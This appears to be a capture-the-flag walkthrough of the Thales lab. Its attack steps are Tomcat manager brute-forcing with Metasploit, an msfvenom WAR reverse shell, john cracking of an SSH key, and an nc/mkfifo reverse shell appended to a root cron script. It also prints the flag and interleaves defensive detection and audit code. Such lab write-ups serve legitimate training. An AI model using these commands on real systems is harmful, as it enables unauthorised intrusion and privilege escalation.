Thales.md

Knowledge points:

  1. Brute-forcing the Tomcat password
  2. Using the msf toolkit
  3. SSH private key cracking
  4. Reverse shells

Lab environment

Lab download address:
Kali IP: 192.168.2.23
Target IP: 192.168.2.12

Information gathering

An arp-scan host discovery sweep finds one live host: 192.168.2.12.

Use nmap for a more detailed port and service scan:

nmap -sV -p- 192.168.2.12 -O -v

  • Port 22 is open, running SSH, version OpenSSH 7.6p1 Ubuntu 4ubuntu0.5.
  • Port 8080 is open, running HTTP, specifically Apache Tomcat 9.0.52.
  • The operating system is Linux, with a kernel version probably between 4.X and 5.X.

Run nmap's vulnerability scripts to see whether the system has any known vulnerabilities.
They report a Slowloris DoS vulnerability, CVE-2007-6750.
They also list directories and paths that may exist on the target server:

| http-enum:   
|   /examples/: Sample scripts  
|   /manager/html/upload: Apache Tomcat (401 )  
|   /manager/html: Apache Tomcat (401 )  
|_  /docs/: Potentially interesting folder

Visiting http://192.168.2.12:8080 shows that the host is running Tomcat, version 9.0.52.

Scanning for directories with dirsearch.

Visiting http://192.168.2.12 shows a login page.

Visiting http://192.168.2.12:8080/examples/ shows some directory listings.

Exploitation

Brute-forcing the Tomcat username and password

Open msf:

┌──(root㉿kali)-[~]
└─# msfconsole 

msf6 > search login tomcat 
Matching Modules
================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/tomcat_mgr_login                   normal  No     Tomcat Application Manager Login Utility

msf6 > use 0
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.2.12
RHOSTS => 192.168.2.12
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

After a short wait, the credentials come back: tomcat:role1
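
As an added, defender-side example (not from the original writeup): a Python detector over Tomcat access-log lines in the default AccessLogValve format (%h %l %u %t "%r" %s %b). It flags the burst of 401 responses on /manager/* that a manager login brute force like the one above leaves behind, and the later 200 from the same source, which is the sign that the guessing worked. The log lines are constructed, and the threshold of 10 failures within 60 seconds is an assumption to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    m = LINE_RE.match(line)           # None for lines in another format
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec

def detect_manager_bruteforce(lines, threshold=10, window_s=60):
    """Alerts as (ip, kind, user): 'bruteforce' once an IP has >= threshold
    401s on /manager/* within window_s seconds, then 'success_after_failures'
    for each later 200 on /manager/* from that IP (user = who logged in)."""
    failures = defaultdict(deque)     # ip -> timestamps of recent 401s
    flagged, alerts = set(), []
    for raw in lines:
        rec = parse_line(raw)
        if rec is None or not rec["path"].startswith("/manager/"):
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["status"] == 401:
            q = failures[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:   # drop old failures
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce", rec["user"]))
        elif rec["status"] == 200 and ip in flagged:
            alerts.append((ip, "success_after_failures", rec["user"]))
    return alerts
def sample_log():
    """Constructed: 12 failed manager logins from one IP in 12 seconds, then a
    successful one, plus an unrelated request from another host."""
    tmpl = ('192.168.2.23 - {user} [08/Mar/2024:02:04:{sec:02d} +0800] '
            '"GET /manager/html HTTP/1.1" {status} {size}')
    lines = [tmpl.format(user="-", sec=s, status=401, size=2473) for s in range(12)]
    lines.append(tmpl.format(user="tomcat", sec=12, status=200, size=15231))
    lines.append('192.168.2.50 - - [08/Mar/2024:02:05:00 +0800] "GET /docs/ HTTP/1.1" 200 7400')
    return lines
```

Running `detect_manager_bruteforce(sample_log())` yields one bruteforce alert for 192.168.2.23 followed by a success alert naming the user tomcat; the same detector over a real log only needs the file lines fed in.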

Log in with them.

The manager page has an upload feature that accepts WAR files, which tells us the back end is Java, so a shell can be uploaded here.

Create a reverse-shell payload with msfvenom:

┌──(root㉿kali)-[~]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.23 LPORT=4501 -f war -o revshell.war

Payload size: 1106 bytes
Final size of war file: 1106 bytes
Saved as: revshell.war

Upload the payload just created.

Start a listener on Kali:

nc -lvvp 4501

Then open /revshell to run the deployed file, and the listener catches the shell.

Use Python to get an interactive shell:

python3 -c "import pty;pty.spawn('/bin/bash')"
tomcat@miletus:/$ 

Take a quick look around for flags.

/home/thales contains two txt files and a .ssh directory. Reading user.txt fails for lack of permission.

tomcat@miletus:/home/thales$ cat notes.txt
cat notes.txt
I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.


Look at .ssh/id_rsa: it is an RSA private key in the legacy PEM format, encrypted (Proc-Type: 4,ENCRYPTED and DEK-Info: AES-128-CBC headers). Save it locally to crack with john later.

SSH private key cracking

Crack it with john:

ssh2john converts the key from the SSH private key file into a format John the Ripper understands; john is then run against it with the /usr/share/wordlists/rockyou.txt wordlist.

First decompress rockyou.txt.gz in /usr/share/wordlists:

┌──(root㉿kali)-[/usr/share/wordlists]
└─# gunzip /usr/share/wordlists/rockyou.txt.gz

┌──(root㉿kali)-[~/Desktop]
└─# ssh2john '/root/Desktop/ssh.txt' > key.txt
                                                                                                                                                                                                                                            
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt '/root/Desktop/key.txt' 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
vodka06          (/root/Desktop/ssh.txt)     
1g 0:00:00:01 DONE (2024-03-08 02:04) 0.7874g/s 2251Kp/s 2251Kc/s 2251KC/s vodka1420..vodka0260
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Password: vodka06
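
Added example, not part of the writeup: why this key cracked so fast, and how a key-hygiene audit tells good keys from bad. john's output above reports KDF cost 0 (MD5) with an iteration count of 1, which is what the legacy PEM format (the Proc-Type: 4,ENCRYPTED / DEK-Info headers of the id_rsa found on the box) gives you; the Python below classifies the two formats ssh-keygen writes and reports whether a key uses the bcrypt KDF of the newer openssh-key-v1 format. The sample keys are constructed and the DEK-Info IV is a placeholder.

```python
import base64
import struct
MAGIC = b"openssh-key-v1\x00"
def _ssh_string(buf, off):            # one length-prefixed string of the blob
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n

def classify_private_key(text):
    """Return (format, passphrase_protected, kdf) for a private key file."""
    lines = [l.strip() for l in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _ssh_string(blob, len(MAGIC))
        kdf, _ = _ssh_string(blob, off)
        return ("openssh-v1", cipher != b"none", kdf.decode())
    if lines[0].startswith("-----BEGIN ") and lines[0].endswith(" PRIVATE KEY-----"):
        headers = dict(l.split(": ", 1) for l in lines[1:] if ": " in l)
        encrypted = headers.get("Proc-Type") == "4,ENCRYPTED"
        # Legacy PEM encryption derives the cipher key from the passphrase with
        # a single MD5 round (EVP_BytesToKey), which is why john runs so fast.
        return ("legacy-pem", encrypted, "md5" if encrypted else "none")
    raise ValueError("unrecognised private key file")
def risk(text):
    """One-line verdict a key-hygiene audit would report."""
    fmt, protected, kdf = classify_private_key(text)
    if not protected:
        return "high: private key is not passphrase-protected"
    if fmt == "legacy-pem":
        return "high: legacy PEM encryption (MD5 KDF); re-encrypt with ssh-keygen -p -o -a 100"
    if kdf != "bcrypt":
        return "high: openssh-v1 key with unexpected KDF " + kdf
    return "ok: openssh-v1 key with bcrypt KDF"

# Constructed samples: LEGACY_KEY copies the header layout of the id_rsa found on
# the box with a placeholder IV and body; make_openssh_key emits only the leading
# fields of an openssh-key-v1 blob, which is all the classifier reads.
LEGACY_KEY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

Zm9vYmFyYmF6cXV4Zm9vYmFyYmF6cXV4Zm9vYmFyYmF6cXV4Zm9vYmFyYmF6cXV4
-----END RSA PRIVATE KEY-----
"""
def make_openssh_key(cipher=b"aes256-ctr", kdf=b"bcrypt"):
    blob = MAGIC + b"".join(struct.pack(">I", len(s)) + s for s in (cipher, kdf))
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")
```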

Switch to the thales user with the password vodka06 and read user.txt to get the flag:

tomcat@miletus:~$ su thales
su thales
Password: vodka06

thales@miletus:/opt/tomcat$ cd /home
cd /home
thales@miletus:/home$ ls -la 
ls -la
total 12
drwxr-xr-x  3 root   root   4096 Aug 15  2021 .
drwxr-xr-x 24 root   root   4096 Oct 14  2021 ..
drwxr-xr-x  6 thales thales 4096 Oct 14  2021 thales
thales@miletus:/home$ cd thales
cd thales
thales@miletus:~$ ls
ls
notes.txt  user.txt
thales@miletus:~$ cat user.txt
cat user.txt
a837c0b5d2a8a07225fd9905f5a0e9c4

Privilege escalation

Follow up on the hint the author left earlier and see what /usr/local/bin/backup.sh holds. A glance at its permissions shows the file is editable.

The script backs up the /opt/tomcat/ directory to /var/backups, producing a .tgz archive named after the current day of the week and the hostname.

A line with a reverse-shell command can be appended to it:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 5555 >/tmp/f" >> backup.sh

After a short wait the reverse shell connects back, and the flag can be read.
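
Added example (not the writeup's own code): the defender's check for the weakness used here. Given system crontab text, it lists every script the jobs run and reports whether an unprivileged user could change what root executes: world- or group-writable, a symlink, non-root-owned, or missing. demo() builds a constructed layout in a temporary directory with a 0777 backup.sh and a 0755 helper; the crontab lines and file contents are made up for the example.

```python
import os
import re
import stat
import tempfile
PATH_RE = re.compile(r"(?<![\w./-])(/[\w./-]+)")   # absolute paths in a command
def cron_script_paths(cron_text):
    """Absolute paths named in the command field of system crontab lines."""
    paths = []
    for line in cron_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                        # comment or VAR=value line
        fields = line.split(None, 6)        # min hour dom mon dow user command
        if len(fields) == 7:
            paths += PATH_RE.findall(fields[6])
    return paths

def loose_perms(path):
    """Why a script run by root's cron could be tampered with, or None."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return "missing: whoever can create it gets code run as root"
    if stat.S_ISLNK(st.st_mode):
        return "symlink: target can be swapped"
    if not stat.S_ISREG(st.st_mode):
        return None                         # device or directory, not a script
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return "writable by gid %d" % st.st_gid
    if st.st_uid != 0:
        return "owned by uid %d, not root" % st.st_uid
    return None

def audit_crontab(cron_text):
    """(path, reason) for every referenced script that could be tampered with."""
    checked = [(p, loose_perms(p)) for p in cron_script_paths(cron_text)]
    return [(p, why) for p, why in checked if why]
def demo():
    """Constructed layout: a 0777 backup.sh next to a 0755 helper, both run
    from a made-up system crontab, mirroring the box's backup job."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "backup.sh"), os.path.join(d, "ok.sh")
    for p, mode in ((bad, 0o777), (good, 0o755)):
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho backup\n")
        os.chmod(p, mode)
    cron = "SHELL=/bin/sh\n*/1 * * * * root %s\n0 3 * * * root %s > /dev/null\n" % (bad, good)
    return audit_crontab(cron)
```

On a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d; the 0755 helper is only reported when the audit is not run as root, because it is then owned by a non-root user.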

posted @ 2024-03-08 16:44  imawuya  Reads (90)  Comments (0)